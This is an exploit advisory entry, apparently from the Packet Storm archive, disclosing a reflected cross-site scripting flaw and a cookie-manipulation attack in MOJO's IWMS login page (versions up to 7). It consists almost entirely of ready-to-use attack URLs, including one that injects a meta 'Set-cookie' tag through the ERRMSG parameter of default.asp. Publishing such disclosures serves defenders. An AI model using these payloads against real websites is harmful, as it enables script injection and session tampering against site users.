MOJO's IWMS Cross Site Scripting

2009-12-18T00:00:00
ID PACKETSTORM:84014
Type packetstorm
Reporter cp77fk4r
Modified 2009-12-18T00:00:00

Description

                                        
                                            `# Exploit Title: MOJO's IWMS Login page XSS and Cookies Manipulation.  
# Date: 17/12/2007  
# Author: cp77fk4r | Empty0pagE[YOU-KNOW]gmail.com<http://gmail.com>  
# Software Link: http://www.mojo.co.il/  
# Version: X <= 7  
  
# Expl0its:  
#[XSS]  
-http://[SITE]/upload/default.asp?mode=wrong&ERRMSG=[XSS-Vuln]  
  
#-[Cookies Manipulation]  
-http://[SITE]/upload/default.asp?mode=wrong&ERRMSG=%3Cmeta+http-equiv='Set-cookie'+content='[Cookie-Name]=[Cookie-Value]'%3E  
  
# EOF  
`